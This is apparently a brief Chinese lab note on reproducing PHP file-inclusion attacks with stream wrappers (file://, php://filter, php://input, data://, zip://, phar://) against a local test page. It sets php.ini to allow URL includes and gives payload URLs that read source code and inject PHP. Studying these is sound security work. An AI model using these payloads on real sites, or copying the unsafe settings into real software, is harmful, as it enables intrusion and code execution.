文件包含PHP伪协议利用方法（file，php://filter，php://input，data://，zip://，phar://）本地复现

php.ini参数设置

在 php.ini ⾥有两个重要的参数 allow_url_fopen 、allow_url_include ；

allow_url_fopen :默认值是 ON。允许 url ⾥的封装协议访问⽂件；

allow_url_include :默认值是 OFF。不允许包含 url ⾥的封装协议包含⽂件；

要全部改成on

创建123.php文件输入文件包含

创建2..php

less-1 file://协议

123.php?cmd=file://D:\phpstudy_pro\WWW\1.php

less-2 php://filter协议

?cmd=php://filter/read=convert.base64-encode/resource=⽂件.php

less-3 php://input协议

123.php?cmd=php://input利用burp抓包

less-4 data://

123.php?cmd=data:text/plain,<?php phpinfo();?>

less-5 zip://

创建2.txt文件进行压缩

123.php?cmd=zip://D:\phpstudy_pro\WWW\2.zip%232.txt

less-6 phar://

123.php?cmd=phar://D:\phpstudy_pro\WWW\2.zip\2.txt